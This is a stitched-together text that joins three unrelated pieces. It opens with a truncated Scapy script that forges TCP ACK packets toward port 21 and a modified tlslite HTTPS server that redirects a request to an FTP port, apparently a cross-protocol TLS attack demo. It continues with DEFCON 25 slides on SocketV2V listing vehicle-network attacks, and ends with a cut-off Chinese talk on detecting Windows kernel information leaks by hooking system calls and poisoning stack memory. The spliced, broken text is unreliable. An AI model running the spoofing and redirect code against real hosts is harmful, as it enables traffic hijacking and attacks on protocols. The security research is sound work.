AckNr = GEThttp[0].seq + 50
SeqNr = GEThttp[0].ack
# Print the GET request of the client (contains browser data and similar data).
# (Sanity check: size of data should be greater than 1.)
data1=TCP(sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
time.sleep(0.5)
send(ip/data1)
print("send ACK")
time.sleep(100)
#fakeack = TCP(window=50,sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=SeqNr, options=[('MSS', 1460)])
#send(ip/fakeack)
#GET302http = sniff(filter="tcp and port 21", count=1, prn=lambda x:x.sprintf("{IP:%IP.src%: %TCP.dport%}"))
# AckNr = GET302http[0].seq + 5
# SeqNr = GET302http[0].ack
# data1=TCP(sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
# #res = sr1(ip/data1/payload)
# Generate custom http file content.
# Generate TCP layer
# time.sleep(3)
# AckNr = a[0].seq+1+270
# SeqNr = a[0].seq + 1
# retransmit=TCP(sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
#
# # Construct whole network packet, send it and fetch the returning ack.
# reres=sr1(ip/retransmit)
# print("send retransmit")
# Store new sequence number.
#retcp = sniff(filter="tcp and port 21", count=1, prn=lambda x:x.sprintf("{IP:%IP.src%: %TCP.dport%}"))
retcp = sniff(filter="tcp and dst port 21 and src port "+str(ValueOfPort), count=1, prn=lambda x:x.sprintf("{IP:%IP.s
print("print retransmit")
if len(retcp[0].load)>1:print(retcp[0].load)
SeqNr = retcp[0].ack
#AckNr= retcp[0].seq + len(retcp[0].load)
AckNr= retcp[0].seq
# Generate RST-ACK packet
#Bye=TCP(sport=80, dport=ValueOfPort, flags="RA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
Bye=TCP(sport=21, dport=ValueOfPort, flags="A", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
# for i in range(1,100):
# send(ip/Bye)
# time.sleep(0.5)
# print("send finish")
#
# Martin von Loewis - python 3 port
#
# See the LICENSE file for legal information regarding use of this file.
from __future__ import print_function
import sys
import os
import os.path
import socket
import time
import getopt
import binascii
import _thread
from scapy.all import *
try:
import httplib
from SocketServer import *
from BaseHTTPServer import *
from SimpleHTTPServer import *
except ImportError:
# Python 3.x
from http import client as httplib
from socketserver import *
from http.server import *
from http.server import SimpleHTTPRequestHandler
if __name__ != "__main__":
raise "This must be run as a command, not used as a module!"
from tlslite.api import *
from tlslite.constants import CipherSuite, HashAlgorithm, SignatureAlgorithm, \
GroupName, SignatureScheme
from tlslite import __version__
from tlslite.utils.compat import b2a_hex
from tlslite.utils.dns_utils import is_valid_hostname
try:
from tack.structures.Tack import Tack
except ImportError:
pass
def printUsage(s=None):
if s:
print("ERROR: %s" % s)
print("")
print("Version: %s" % __version__)
print("")
print("RNG: %s" % prngName)
print("")
print("Modules:")
if tackpyLoaded:
print(" tackpy : Loaded")
else:
print(" tackpy : Not Loaded")
if m2cryptoLoaded:
print(" M2Crypto : Loaded")
else:
print(" M2Crypto : Not Loaded")
if pycryptoLoaded:
print(" pycrypto : Loaded")
else:
print(" pycrypto : Not Loaded")
if gmpyLoaded:
print(" GMPY : Loaded")
else:
print(" GMPY : Not Loaded")
print("")
print("""Commands:
server
[-k KEY] [-c CERT] [-t TACK] [-v VERIFIERDB] [-d DIR] [-l LABEL] [-L LENGTH]
[--reqcert] [--param DHFILE] HOST:PORT
client
[-k KEY] [-c CERT] [-u USER] [-p PASS] [-l LABEL] [-L LENGTH] [-a ALPN]
HOST:PORT
LABEL - TLS exporter label
LENGTH - amount of info to export using TLS exporter
ALPN - name of protocol for ALPN negotiation, can be present multiple times
in client to specify multiple protocols supported
DHFILE - file that includes Diffie-Hellman parameters to be used with DHE
key exchange
""")
sys.exit(-1)
def printError(s):
"""Print error message and exit"""
sys.stderr.write("ERROR: %s\n" % s)
sys.exit(-1)
def handleArgs(argv, argString, flagsList=[]):
# Convert to getopt argstring format:
# Add ":" after each arg, ie "abc" -> "a:b:c:"
getOptArgString = ":".join(argString) + ":"
try:
opts, argv = getopt.getopt(argv, getOptArgString, flagsList)
except getopt.GetoptError as e:
printError(e)
# Default values if arg not present
privateKey = None
certChain = None
username = None
password = None
tacks = None
verifierDB = None
reqCert = False
directory = None
expLabel = None
expLength = 20
alpn = []
dhparam = None
for opt, arg in opts:
if opt == "-k":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
# OpenSSL/m2crypto does not support RSASSA-PSS certificates
privateKey = parsePEMKey(s, private=True,
implementations=["python"])
elif opt == "-c":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
x509 = X509()
x509.parse(s)
certChain = X509CertChain([x509])
elif opt == "-u":
username = arg
elif opt == "-p":
password = arg
elif opt == "-t":
if tackpyLoaded:
s = open(arg, "rU").read()
tacks = Tack.createFromPemList(s)
elif opt == "-v":
verifierDB = VerifierDB(arg)
verifierDB.open()
elif opt == "-d":
directory = arg
elif opt == "--reqcert":
reqCert = True
elif opt == "-l":
expLabel = arg
elif opt == "-L":
expLength = int(arg)
elif opt == "-a":
alpn.append(bytearray(arg, 'utf-8'))
elif opt == "--param":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
dhparam = parseDH(s)
else:
assert(False)
# when no names provided, don't return array
if not alpn:
alpn = None
if not argv:
printError("Missing address")
if len(argv)>1:
printError("Too many arguments")
#Split address into hostname/port tuple
address = argv[0]
address = address.split(":")
if len(address) != 2:
raise SyntaxError("Must specify <host>:<port>")
address = ( address[0], int(address[1]) )
# Populate the return list
retList = [address]
if "k" in argString:
retList.append(privateKey)
if "c" in argString:
retList.append(certChain)
if "u" in argString:
retList.append(username)
if "p" in argString:
retList.append(password)
if "t" in argString:
retList.append(tacks)
if "v" in argString:
retList.append(verifierDB)
if "d" in argString:
retList.append(directory)
if "reqcert" in flagsList:
retList.append(reqCert)
if "l" in argString:
retList.append(expLabel)
if "L" in argString:
retList.append(expLength)
if "a" in argString:
retList.append(alpn)
if "param=" in flagsList:
retList.append(dhparam)
return retList
def printGoodConnection(connection, seconds):
print(" Handshake time: %.3f seconds" % seconds)
print(" Version: %s" % connection.getVersionName())
print(" Cipher: %s %s" % (connection.getCipherName(),
connection.getCipherImplementation()))
print(" Ciphersuite: {0}".\
format(CipherSuite.ietfNames[connection.session.cipherSuite]))
if connection.session.srpUsername:
print(" Client SRP username: %s" % connection.session.srpUsername)
if connection.session.clientCertChain:
print(" Client X.509 SHA1 fingerprint: %s" %
connection.session.clientCertChain.getFingerprint())
else:
print(" No client certificate provided by peer")
if connection.session.serverCertChain:
print(" Server X.509 SHA1 fingerprint: %s" %
connection.session.serverCertChain.getFingerprint())
if connection.version >= (3, 3) and connection.serverSigAlg is not None:
scheme = SignatureScheme.toRepr(connection.serverSigAlg)
if scheme is None:
scheme = "{1}+{0}".format(
HashAlgorithm.toStr(connection.serverSigAlg[0]),
SignatureAlgorithm.toStr(connection.serverSigAlg[1]))
print(" Key exchange signature: {0}".format(scheme))
if connection.ecdhCurve is not None:
print(" Group used for key exchange: {0}".format(\
GroupName.toStr(connection.ecdhCurve)))
if connection.dhGroupSize is not None:
print(" DH group size: {0} bits".format(connection.dhGroupSize))
if connection.session.serverName:
print(" SNI: %s" % connection.session.serverName)
if connection.session.tackExt:
if connection.session.tackInHelloExt:
emptyStr = "\n (via TLS Extension)"
else:
emptyStr = "\n (via TACK Certificate)"
print(" TACK: %s" % emptyStr)
print(str(connection.session.tackExt))
if connection.session.appProto:
print(" Application Layer Protocol negotiated: {0}".format(
connection.session.appProto.decode('utf-8')))
print(" Next-Protocol Negotiated: %s" % connection.next_proto)
print(" Encrypt-then-MAC: {0}".format(connection.encryptThenMAC))
print(" Extended Master Secret: {0}".format(
connection.extendedMasterSecret))
def printExporter(connection, expLabel, expLength):
if expLabel is None:
return
expLabel = bytearray(expLabel, "utf-8")
exp = connection.keyingMaterialExporter(expLabel, expLength)
exp = b2a_hex(exp).upper()
print(" Exporter label: {0}".format(expLabel))
print(" Exporter length: {0}".format(expLength))
print(" Keying material: {0}".format(exp))
def clientCmd(argv):
(address, privateKey, certChain, username, password, expLabel,
expLength, alpn) = \
handleArgs(argv, "kcuplLa")
if (certChain and not privateKey) or (not certChain and privateKey):
raise SyntaxError("Must specify CERT and KEY together")
if (username and not password) or (not username and password):
raise SyntaxError("Must specify USER with PASS")
if certChain and username:
raise SyntaxError("Can use SRP or client cert for auth, not both")
if expLabel is not None and not expLabel:
raise ValueError("Label must be non-empty")
#Connect to server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(address)
connection = TLSConnection(sock)
settings = HandshakeSettings()
settings.useExperimentalTackExtension = True
try:
start = time.perf_counter()
if username and password:
connection.handshakeClientSRP(username, password,
settings=settings, serverName=address[0])
else:
connection.handshakeClientCert(certChain, privateKey,
settings=settings, serverName=address[0], alpn=alpn)
stop = time.perf_counter()
print("Handshake success")
except TLSLocalAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
else:
raise
sys.exit(-1)
except TLSRemoteAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
else:
raise
sys.exit(-1)
printGoodConnection(connection, stop-start)
printExporter(connection, expLabel, expLength)
connection.close()
def serverCmd(argv):
(address, privateKey, certChain, tacks, verifierDB, directory, reqCert,
expLabel, expLength, dhparam) = handleArgs(argv, "kctbvdlL",
["reqcert", "param="])
if (certChain and not privateKey) or (not certChain and privateKey):
raise SyntaxError("Must specify CERT and KEY together")
if tacks and not certChain:
raise SyntaxError("Must specify CERT with Tacks")
print("I am an HTTPS test server, I will listen on %s:%d" %
(address[0], address[1]))
if directory:
os.chdir(directory)
print("Serving files from %s" % os.getcwd())
if certChain and privateKey:
print("Using certificate and private key...")
if verifierDB:
print("Using verifier DB...")
if tacks:
print("Using Tacks...")
if reqCert:
print("Asking for client certificates...")
#############
sessionCache = SessionCache()
username = None
sni = None
if is_valid_hostname(address[0]):
sni = address[0]
class MySimpleHTTPHandler(SimpleHTTPRequestHandler, object):
"""Buffer the header and body of HTTP message."""
wbufsize = -1
def do_GET(self):
if self.path.startswith('/abc'):
time.sleep(5)
self.wfile.write(b'HTTP/1.1 302 Found\r\n')
self.wfile.write(b'Location:https://172.28.64.142:21\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
"""Simple override to send KeyUpdate to client."""
if self.path.startswith('/keyupdate'):
for i in self.connection.send_keyupdate_request(
KeyUpdateMessageType.update_requested):
if i in (0, 1):
continue
else:
raise ValueError("Invalid return from "
"send_keyupdate_request")
if self.path.startswith('/secret') and not request_pha:
try:
for i in self.connection.request_post_handshake_auth():
pass
except ValueError:
self.wfile.write(b'HTTP/1.0 401 Certificate authentication'
b' required\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
self.connection.read(0, 0)
if self.connection.session.clientCertChain:
print(" Got client certificate in post-handshake auth: "
"{0}".format(self.connection.session
.clientCertChain.getFingerprint()))
else:
print(" No certificate from client received")
self.wfile.write(b'HTTP/1.0 401 Certificate authentication'
b' required\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
return super(MySimpleHTTPHandler, self).do_GET()
class MyHTTPServer(ThreadingMixIn, TLSSocketServerMixIn, HTTPServer):
def __init__(self,a,b):
self.tlstimes = 0
super(HTTPServer,self).__init__(a,b)
def handshake(self, connection):
if self.tlstimes !=0:
#time.sleep(100)
pass
self.tlstimes = self.tlstimes+1
print("About to handshake...")
activationFlags = 0
if tacks:
if len(tacks) == 1:
activationFlags = 1
elif len(tacks) == 2:
activationFlags = 3
try:
start = time.perf_counter()
settings = HandshakeSettings()
settings.useExperimentalTackExtension=True
settings.dhParams = dhparam
connection.handshakeServer(certChain=certChain,
privateKey=privateKey,
verifierDB=verifierDB,
tacks=tacks,
activationFlags=activationFlags,
sessionCache=sessionCache,
settings=settings,
nextProtos=[b"http/1.1"],
alpn=[bytearray(b'http/1.1')],
reqCert=reqCert,
sni=sni)
# As an example (does not work here):
#nextProtos=[b"spdy/3", b"spdy/2", b"http/1.1"])
stop = time.perf_counter()
except TLSRemoteAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
return False
else:
raise
except TLSLocalAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
return False
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
return False
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
return False
else:
raise
connection.ignoreAbruptClose = True
printGoodConnection(connection, stop-start)
printExporter(connection, expLabel, expLength)
return True
# def runhttpd(httpd):
# httpd.serve_forever(5)
httpd = MyHTTPServer(address, MySimpleHTTPHandler)
# _thread.start_new_thread(runhttpd, (httpd,))
# while True:
# if httpd.tlstimes == 1:
# #time.sleep(0.5)
# #httpd.shutdown()
# #break
# else:
# pass
httpd.serve_forever(20)
if __name__ == '__main__':
if len(sys.argv) < 2:
printUsage("Missing command")
elif sys.argv[1] == "client"[:len(sys.argv[1])]:
clientCmd(sys.argv[2:])
elif sys.argv[1] == "server"[:len(sys.argv[1])]:
serverCmd(sys.argv[2:])
else:
printUsage("Unknown command: %s" % sys.argv[1])
0x04
demoftptls ticket
payloaddemo | pdf |
Linux-Stack Based V2X Framework: SocketV2V
All You Need to Hack Connected Vehicles
Duncan Woodbury, Nicholas Haltmeyer
{[email protected], [email protected]}
DEFCON 25: July 29, 2017
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
1 / 48
State of the World: (Semi)Autonomous Driving
Technologies
Vehicular automation widespread in global industry
Automated driving technologies becoming accessible to general public
Comms protocols used today in vehicular networks heavily flawed
New automated technologies still using CANBUS and derivatives
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
2 / 48
Stages of Autonomy
Today: Stage 2 Autonomy - Combined Function Automation
V2X: Stage 3 Autonomy - Limited Self-Driving Automation
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
3 / 48
Barriers to Stage 3+ Autonomy
Ownership of ethical responsibilities - reacting to safety-critical events
Technological infrastructure
Installing roadside units, data centers, etc.
Adaptive and intuitive machine-learning technology
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
4 / 48
V2X Concept
Vehicles and Infrastructure use
WAVE over 5.8-5.9GHz adhoc
mesh network to exchange state
information
Link WAVE/DSRC radios to
vehicle BUS to enable
automated hazard awareness
and avoidance
Technological bridge to fully
autonomous vehicles
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
5 / 48
Critical Aspects of V2V
High throughput vehicular ad hoc mesh network (VANET)
Provide safety features beyond capability of onboard sensors
Geared for homogeneous adoption in consumer automotive systems
Easy integration with existing transportation infrastructure
First application of stage 3 automation in consumer marketplace
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
6 / 48
Impact of V2X Technologies
Transportation network impacts all aspects of society
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
7 / 48
Impact of V2X Technologies: on Consumers
Safety benefits:
Prevent 25,000 to
592,000 crashes
annually
Avoid 11,000 to
270,000 injuries
Prevent 31,000 to
728,000 property
damaging crashes
Traffic flow optimization:
27% reduction for freight
23% reduction for emergency vehicles
42% reduction on freeway (with cooperative adaptive cruise control &
speed harmonization)
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
8 / 48
Impact of V2X Technologies: Global Industry
Scalable across industrial
platforms
Optimize swarm functions
Improve exchange of sensor
data
Enhance/improve worker safety
Vehicle-to-pedestrian
Construction, agriculture,
maintenance
Improve logistical operations management
Think: air traffic control for trucks
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
9 / 48
Impact of V2X Technologies: Critical Infrastructure
Provide interface for infrastructure to leverage VANET as carrier
Increase awareness of traffic patterns in specific regions
Analysis of network traffic facilitates improvements in civil engineering
processes
Fast widespread distribution of emergency alerts
Reduce cost of public transit systems
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
10 / 48
Impact of V2X Technologies: Automotive Security
Wide open wireless attack vector into transportation network
Injections easily propagate across entire VANET
Wireless reverse engineering using 1609 and J2735
Easy to massively distribute information (malware)
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
11 / 48
Technologies Using V2X
Collision avoidance (Forward Collision Warning) systems
Advanced Driver Assistance Systems (ADAS)
Cooperative adaptive cruise control
Automated ticketing and tolling
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
12 / 48
Vision of SocketV2V
Security through
obscurity leads to
inevitable pwning
Security community
must be involved in
development of
public safety systems
Catalyze development of secure functional connected systems
Provide interface to VANET with standard COTS hardware
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
13 / 48
Background on SocketV2V
Linux V2V development begins November 2015
Large body of existing work found to be incomplete
No open-source implementation exists
Attempts at integration in linux-wireless since 2004
Abandon e↵orts to patch previous attempts mid-2016
Two years of kernel debugging later, V2V is real
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
14 / 48
Motivation for V2X Development
Current standards for onboard vehicle communications not designed
to handle VANET
Increase in automation ) increase in attack surface
Auto industry calling for proprietary solutions
Leads to a monopolization of technology
Standards still incomplete and bound for change, proprietary solutions
become obsolete
Multiple alternative standards being developed independently across
borders
Imminent deployment requires immediate attention
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
15 / 48
Lessons Learned from Previous Epic Failure
1 You keep calling yourself
a kernel dev, I do not
think it means what you
think it means
2 Sharing is caring: closed-source development leads to failure
3 Standards committees need serious help addressing unprecedented
levels of complexity in new and future systems
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
16 / 48
V2X Stack Overview
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
17 / 48
V2X Stack Overview: 802.11p
Wireless Access in Vehicular Environments
Amendment to IEEE 802.11-2012 to support WAVE/DSRC
PHY layer of V2X stack
No association, no authentication, no encryption
Multicast addressing with wildcard BSSID = {↵:↵:↵:↵:↵:↵}
5.8-5.9GHz OFDM with 5/10MHz subcarriers
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
18 / 48
IEEE 1609
WAVE Short Message Protocol (WSMP)
1609.2 Security Services
PKI, cert revocation, misbehavior reporting
1609.3 Networking Services
Advertisements, message fields
1609.4 Multi-Channel Operation
Channel sync, MLMEX
1609.12 Identifier Allocations
Provider service IDs
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
19 / 48
IEEE 1609: WAVE Short Message
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
20 / 48
V2X Stack Overview: SAE J2735
Message dictionary specifying message formats, data elements
Basic safety message, collision avoidance, emergency vehicle alert, etc.
ASN1 UPER specification
Also supports XML encoding
Data element of Wave Short Message
Application-layer component of V2X stack
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
21 / 48
State of V2X Standards: Evolution
WAVE drafted in 2005, J2735 in 2006
WAVE revisions not backwards compatible
IEEE 1609.2 incomplete
J2735 revisions not backwards compatible
Encoding errors in J2735 ASN1 specification
3 active pilot studies by USDOT
Experimental V2X deployment in EU
Developmental status still in flux
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
22 / 48
Major Changes to the Standards
Refactoring of security services to change certificate structure
Refactoring of management plane to add services (P2PCD)
Refactoring of application layer message encoding format
Multiple times: BER ) DER ) UPER
Refactoring of application layer ASN1 configuration
Revision of trust management system - still incomplete
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
23 / 48
(Possibly Unintentional) Obfuscation of the Standards
No specification of handling for service management and RF
optimization
Minimal justification given for design choices
Introduction of additional ambiguity in message parsing (WRA IEX
block)
Redlining of CRC data element in J2735 messages
Refactoring of J2735 ASN1 to a non standard format
Proposed channel sharing scheme with telecom
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
24 / 48
Subtleties in WAVE/J2735
Ordering of certain fields not guaranteed in 1609
Type incongruities in 1609
Wave Information Element contains nested structures
Channel synchronization mechanism based on proximal VANET traffic
Channel switching necessary with one-antenna systems
Implementation-specific vulnerabilities can e↵ect entire network
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
25 / 48
V2X Attack Surfaces
VANET accessible from a single endpoint
Attacks propagate easily across network
Entry point to all systems connected to V2X infrastructure
Manipulation of traffic control systems: lights, bridges
Public transportation
Tolling and financial systems
DSRC interface acts as entry point to onboard systems
Wireless access to vehicle control BUS
Transport malware across trafficked borders
Privilege escalation in PKI
Hijacking emergency vehicle authority
Certificate revocation via RSU
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
26 / 48
Understanding the Adversary: Passive
Determine trajectory of cars within some radius
Few stations required to monitor a typical highway
Enumerate services provided by peers
Characterize network traffic patterns within regions
Uniquely fingerprint network participants independent of PKI
RF signature
Probe responses
Behavior patterns
Perform arbitrage on economic markets
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
27 / 48
Understanding the Adversary: Active
Denial of service, MITM
Impersonate infrastructure point
Manipulate misbehavior reports
Disrupt vehicle traffic
Target specific platforms and individuals
Economic warfare: manipulation of supply/distribution networks
Behavior modeling and manipulation
Privilege escalation in VANET
Parade as an emergency vehicle or moving toll station
Ad hoc PKI for application-layer services
Assume vehicle control via platooning service
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
28 / 48
V2X Threat Model: Applied
Network traffic can be corrupted over-the-air
Ad hoc PKI can allow certificate hijacking
Diagnostic services in DSRC implementation expose vehicle control
network
Valid DSRC messages can pass malicious instructions to infotainment
BUS
Fingerprinting possible regardless of PKI pseudonym scheme
Trust management services vulnerable to manipulation
Misbehavior reporting
Certificate revocation
Denial of P2P certificate distribution
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
29 / 48
Our Solution: Just Use Linux
Platform-independent* V2X stack integrated in mainline Linux kernel
No proprietary DSRC hardware/software required - uses COTS hw
Extensible in generic Linux environment
*Currently supports ath9k
Implements 802.11p, IEEE 1609.{3,4} in Linux networking subsystem
mac80211, cfg80211, nl80211
1609 module to route WSMP frames
Underlying 802.11 architecture compatible with Linux networking
subsystem
Mainline kernel integration leads to immediate global deployment
This enables rapid driver integration
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
30 / 48
SocketV2V: Implementing 802.11p in Linux Kernel
Add driver support for
ITS 5.825-5.925GHz
band
Define ITS 5.8-5.9GHz
channels
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
31 / 48
SocketV2V: Implementing 802.11p in Linux Kernel
Modify kernel
and userspace
local regulatory
domain
Force use of
user-specified regulatory
domain
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
32 / 48
SocketV2V: Implementing 802.11p in Linux Kernel
Enable filtering
for 802.11p
frames
Require use of
wildcard BSSID
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
33 / 48
SocketV2V: Userspace Utility Modifications for 802.11p
Add iw command
for joining 5GHz
ITS channels
using OCB
Add iw
definitions for
5/10MHz-width
channels in OCB
Use iw to join
ITS spectrum
with COTS WiFi
hardware!
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
34 / 48
SocketV2V: Implementing WAVE in Linux
Functions to pack, parse, and broadcast messages
Relevant data structures
WSM, WSA, WRA, SII, CII, IEX
Full control of fields
subtype, TPID, PSID, chan, tx power, data rate, location, etc.
Operating modes for setting degree of compliance to standard (strict,
lax, loose)
Channel switching, dispatch
Netlink socket interface to userspace
Userspace link to the 802.11p kernel routines
Manage channel switching using iw
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
35 / 48
WAVE Usage
Message fields set in struct wsmp wsm
WSMs encoded to bitstream through wsmp wsm encode
WSM bitstream decoded through wsmp wsm decode
Functions for generating random WSMP frames to specified
compliance
Opens socket to 802.11p wireless interface
Inject WSMs with prefix EtherType 0x86DC
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
36 / 48
WAVE Structs: WSM
WAVE Short
Message:
message
encapsulation
and forwarding
parameters
(N-hop, flooding)
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
37 / 48
WAVE Structs: IEX
Information
Element
Extension:
optional fields for
RF, routing, and
services
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
38 / 48
(More) WAVE Structs
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
39 / 48
SocketV2V: Implementing J2735
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
40 / 48
SocketV2V: Implementing J2735
Generate WSM
Pack J2735 msg in
WSM data element
Serialize WSM
Tx using
pcap inject!
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
41 / 48
SocketV2V: Implementing J2735
Wireshark WSMP plugin incomplete per current 1609 encoding
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
42 / 48
SocketV2V: Implementing J2735
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
43 / 48
Future Pwning of ITS: You Wanna be a Master?
Level 1: Denial of Service
Single-antenna DSRC systems susceptible to collision attack
Level 2: DSRC spectrum sweep, enumerate proprietary (custom)
services available per participant
Level 3: Impersonate an emergency vehicle
Level 4: Become mobile tollbooth
Level 1337: Remotely execute platooning service
Assume direct control
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
44 / 48
Additional Forms of Pwning
Pandora’s box:
Mass dissemination of malware
Passive surveillance with
minimal e↵ort
Extract RF parameters for
imaging
Reverse engineer system
architectures given enough data
Epidemic propagation model
Built in protocol switching
Exfiltration over comm
bridges!
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
45 / 48
Developing Connected Vehicle Technologies
Widespread access enables engagement of security (1337) community
in standards development
Interact with existing V2X infrastructure
Pressure manufacturers and OEMs to implement functional V2V
Deploy ahead of market - experimental platforms
UAS, maritime, orbital, heavy vehicles
Opportunity for empirical research: See what you can break
Straightforward to wardrive
Hook DIY radio (Pi Zero with 5GHz USB adapter) into CANBUS (for
science ONLY)
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
46 / 48
Acknowledgments
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
47 / 48
References
Check me out on GitHub: https://github.com/p3n3troot0r/socketV2V
Estimated Benefits of Connected Vehicle Applications – Dynamic Mobility
Applications, AERIS, V2I Safety, and Road Weather Management Applications –
U.S. Department of Transportation, 2015
Vehicle-to-Vehicle Communications: Readiness of V2V Technology for Application
– U.S. Department of Transportation, National Highway Traffic Safety
Administration, 2014
William Whyte, Jonathan Petit, Virendra Kumar, John Moring and Richard Roy,
”Threat and Countermeasures Analysis for WAVE Service Advertisement,” IEEE
18th International Conference on Intelligent Transportation Systems, 2015
E. Donato, E. Madeira and L. Villas, ”Impact of desynchronization problem in
1609.4/WAVE multi-channel operation,” 2015 7th International Conference on
New Technologies, Mobility and Security (NTMS), Paris, 2015, pp. 1-5.
Papernot, Nicolas, et al. ”Practical black-box attacks against deep learning systems
using adversarial examples.”
p3n3troot0r, ginsback
DEFCON: V2X
DEFCON 25: July 29, 2017
48 / 48 | pdf |
如何在3个月发现12个内
核信息泄露漏洞
陈唐晖 李龙 百度安全实验室
2019
目录
0. 我是谁
1. 认识漏洞
2. 研究漏洞
• 堆栈数据污染
• 检测漏洞技术
• CVE实例分析
3. 成果
4. 总结和思考
我是谁?
•
百度安全实验室资深安全研发工程师
•
百度杀毒、卫士主防设计者和负责人
•
十多年的windows内核研究和开发经验
•
深谙Rootkit技术,内功深厚,剑法独到
•
偶然涉入漏洞挖掘领域
Tanghui Chen
[email protected]
什么是内核信息泄露漏洞?
Windows内核存在很多信息泄露漏洞,可能导致绕过KASLR或系统关
键信息泄露,攻击者可以利用它们得到一些重要信息,比如:
•
加密密钥
•
内核对象
•
关键模块地址
•
…
漏洞是如何产生的?
如CVE-2018-8443
1. 用户态调用ZwDeviceIoControlFile (..., 0x7d008004, Output,…);
2. ZwDeviceIoControlFile经过系统调用进入内核
3. 返回用户态后,Output包含内核栈中未初始化的数据
现有的挖掘技术
•
BochsPwn
❑
CPU指令模拟
•
DigTool
❑
重量级VT技术
•
插桩
•
…
挖掘信息泄露漏洞的方法
第1步:堆/栈数据污染方法
•
Hook KiFastCallEntry,内核栈污染
•
Hook ExAllocatePoolWithTag,内核堆污染
•
对堆和栈的内存数据填充特殊标志数据,如AA等
在Hook KiFastCallEntry中,通过IoGetStackLimits获取内核栈内存,填充特殊标志数据
IoGetStackLimits(&LowLimit, &HighLimit);
__asm{
xor eax, eax;
mov al, g_cFlags; //0xAA
mov edi, LowLimit;
mov ecx, Esp_Value;
